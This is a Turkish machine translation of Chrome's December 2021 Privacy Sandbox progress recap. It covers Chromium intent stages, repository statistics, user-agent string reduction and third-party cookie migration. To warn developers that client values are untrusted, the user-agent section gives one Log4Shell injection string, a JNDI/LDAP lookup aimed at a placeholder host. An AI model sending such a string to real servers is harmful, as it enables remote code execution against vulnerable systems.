Bu sayfa, Cloud Translation API ile çevrilmiştir.

Özel Korumalı Alan'da İlerleme (Aralık 2021)

Özel Korumalı Alan'da İlerleme'nin 2021 özet sayısına hoş geldiniz. Bu videoda, Chrome'da üçüncü taraf çerezleri kullanımdan kaldırma ve daha gizli bir web için çalışma yolundaki dönüm noktalarını takip ediyoruz. Normalde, Özel Korumalı Alan zaman çizelgesinde yapılan güncellemeleri ve proje genelindeki haberleri paylaşıyoruz ancak Aralık ayı sakin bir aydı. Bunun yerine, 2021 yılı boyunca gerçekleştirilen etkinliklerden bazılarını yeniden gözden geçirecek ve yeni yıla girerken alabileceğiniz birkaç potansiyel çözüm sunacağız.

Chromium geliştirme süreci

Yeni bir web platformu özelliğinin Chromium'a gelmesi için bu özelliğin, projenin açık geliştirme sürecinden geçmesi gerekir. Özel Korumalı Alan ekibi 2021'de şunları üretti:

🥚	Prototip Oluşturma Amacı	19
🧪	Deneme Amacı	7
🚀	Gönderim Amacı	11

Kaynak

Her aşama aynı zamanda daha geniş web ekosistemini katkıda bulunmaya davet ediyor.

Prototip Oluşturma Niyeti, tartışma ve ilk deneyleri davet ettiğimiz ilk kontrol noktasıdır. Bu, bir Sorun oluşturarak soru sorabileceğiniz veya W3C ile IETF gibi standartlar gruplarındaki tartışmalara ve sunulara katılabilirsiniz. GitHub'da bir teklif kullanıma sunulacaktır. Kodlama da bu noktada başlar. Yani prototip işlevselliğinin, geliştirici testleri için bir özellik işareti arkasından sunulmasını bekleyebilirsiniz. İlk geri bildirim, teklifleri doğrulamak ve yinelemek için kritik öneme sahiptir.

Kaynak denemesi talep etmek istediğimiz durumlarda Deneme Amacı isteğe bağlı bir adımdır. Geliştiriciler bir özelliğin kaynak deneme sürümüne kaydolabilir ve ardından bunu üretimde test edebilirler. Özelliğin gerçek dünya ortamlarında doğrulamak istediğimiz belirli yönleri olduğundan buna deneme deniyor. Bu testlerin sonuçlarını test edip paylaşabilen geliştiriciler, özelliği tekrarlayıp geliştirmek için değerli geri bildirimler sağlarlar.

Gönderim Amacı, bir özelliğin artık tamamlandığını ve genel kullanıma hazır olduğunu gösteren son aşamadır. Onaylandığında, özellik yeni bir sürümde birleştirilir ve ardından Canary, Beta ve Kararlı kanallarında ilerler. Bir özellik Kararlı'ya ulaşmadan önce hataları yakalayıp bildirmek için sitelerinizi Chrome'un Canary ve Beta sürümleriyle test ettiğinizden emin olmanız çok önemlidir.

Teklifler

Her Özel Korumalı Alan teklifine eşlik eden bir GitHub deposu bulunur. Bir depo, genel işlevi özetleyen bir açıklayıcı, tarayıcılar tarafından uygulama için ayrıntılı bir spesifikasyon ve web ekosistemi genelinde Sorunlar ve Çekme İstekleri biçiminde yapılan katkılar barındırır.

14 Özel Korumalı Alan deposunda şunları gerçekleştirdik:

💬	545	Oluşturulan sorunlar
💬	250	Sorunlar kapatıldı
🛠️	261	Pull İstekleri oluşturuldu
🛠️	223	Pull İstekleri birleştirildi

Kaynak

Açıklayıcılarda ve spesifikasyonlarda kullanılan dil, genellikle zaten standartlara ve tarayıcı geliştirmesine aşina olan bir kitleyi hedefler. Bu da, aşina değilseniz zorlayıcı olabilir. Ancak açıklayıcıların amacı açıklamaktır. Net olmayan veya ele alınmayan noktalar varsa açıklayıcıyı güncelleyip açıklığa kavuşturabilmemiz için bir Sorunu bildirmenizi isteriz.

Çözünürlükler

Kullanıcı aracısı bahar temizliği

Yeni yıla geri sayım yaparken hem Chrome 100'e hem de kullanıcı aracısı dizesindeki kademeli azalmaya kadar da sayım yapıyoruz. Bu, kullanıcı aracısı dizesinin kodunuzdaki herhangi bir kullanımını tekrar ziyaret ederek bu değişikliklerden etkilenip etkilenmediğini kontrol etmeniz için iyi bir motivasyon sağlar.

Bu alanları bulmak için:

JavaScript kodunuzda navigator.userAgent araması yapın veya sunucu kodunuzda User-Agent başlığına erişin.
Dizeyi ayrıştırma işleminde, 2 haneli bir sürümle ilgili varsayımları kontrol edin. Örneğin, \d\d veya \d{2} belirten bir normal ifade \d+ ile değiştirilmelidir.
Aşağıdakilere bağlı olduğunuz her yerde dize kullanımınızı kontrol edin:
- platform (işletim sistemi) sürümü
- tam Chrome derleme sürümü
- mobil cihaz adı
Bunlar, gelecekte sabit dizelere indirilecek değerlerdir. Bu değerlere erişmeniz gerekiyorsa User-Agent İstemci İpuçları'na geçiş yapın.

Aralık ayında bahsedeceğimiz bir güncelleme var. User-Agent İstemci İpuçları'nı kullanıyorsanız <meta> etiketi aracılığıyla HTML'deki diğer kaynaklara ipuçları yetkilendirmeyi etkinleştirme için Gönderim Amacı'nı gönderdik. Örneğin:

<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">

Bahar temizliğinden hoşlanıyorsanız kullanıcı aracısı kullanımı konusunda alternatifler kullanmayı da düşünebilirsiniz. Dizeyi mobil cihazları algılamak için kullanıyorsanız bunu duyarlı tasarımla değiştirip değiştiremeyeceğinizi araştırın. Özellik desteği için tarayıcı adını ve sürümünü kontrol ediyorsanız bunun yerine özellik algılamayı kullanıp kullanamayacağınıza bakın.

Müşteri tarafından sağlanan tüm değerler gibi, kullanıcı aracısının da doğru olacağı ve hatta sağlanacağı garanti edilmediğini her zaman unutmayın. Kısa süre önce yayınlanan Log4j güvenlik açığı olan "Log4shell", bu riskin bir örneğini sunar. Kullanıcı aracısı dizesini ${jndi:ldap://example.com/file} gibi bir değer içerecek şekilde ayarlayan bir istemci, sitenin bunu sunucuda etkin bir şekilde ayrıştırmasını sağlayabilir.

Çerez kataloglama

Bir diğer geleneksel yeni yıl aktivitesi de kaliteli malzemeli, sağlıklı kurabiye yaptığınız için mutlu olmaktır. Üçüncü taraf çerezlerini kullanımdan kaldırma aşamalarına doğru devam ederken, sitenizin çerezlerinden hangilerinin etkileneceğini bildiğinizden emin olmalısınız. Siteler arası veya üçüncü taraf kullanım için tüm çerezleri SameSite=None ile işaretlemek gerektiği için 2020 yılı avantajlı bir başlangıç sağladı.

SameSite özelliğini None olarak ayarladığınız tüm çerezler için güncelleme yapılması gerekir.

Şu anda değerlendirebileceğiniz üç olası yol vardır:

Çerez yalnızca üst düzey siteyle bire bir ilişkide gerekliyse CHIPS teklifinin ilerleme durumunu takip edin. Bu, çereze Partitioned özelliğini eklemek anlamına gelir.
Çerez, siteler arası bir bağlamda ancak yalnızca sahibi olduğunuz ve yönettiğiniz sitelerde kullanılıyorsa Birinci Taraf Grupları için bir aday olabilir. Bu, gruptaki sitelerin tanımlanmasını ve SameParty özelliğinin çereze eklenmesini gerektirir.
Çerez, birden çok sitede bir tür paylaşılan değer sağlamak amacıyla kullanılıyorsa siteler arası izlemeye dayalı olmayan alternatif bir çözüm için Özel Korumalı Alan teklif grubunu araştırın.

Kendinizi özellikle sağlıklı hissediyorsanız bu, tüm kurabiye kullanımınızı tekrar gözden geçirmek için de ideal bir zamandır çünkü birinci taraf çerezlerinizi daha iyi hale getirecek iyi bir tarifimiz vardır.

Geri bildirim

Bu aylık güncellemeleri yayınlamaya ve Özel Korumalı Alan'da bir bütün olarak ilerlemeye devam ederken, geliştiricilerin ihtiyaç duydukları bilgileri ve desteği aldığından emin olmak istiyoruz. Bu seriyle ilgili geliştirebileceğimiz herhangi bir şey varsa @ChromiumDev Twitter üzerinden bize bildirin. Görüşlerinizi biçimi geliştirmeye devam etmek için kullanacağız.

Geliştirici destek deposuna gönderdiğiniz sorunlara bağlı olarak genişletmeye devam ettiğimiz Özel Korumalı Alan hakkında SSS bölümüne göz atın. Tekliflerden herhangi birinde test veya uygulama konusunda sorularınız varsa oradan bize ulaşabilirsiniz.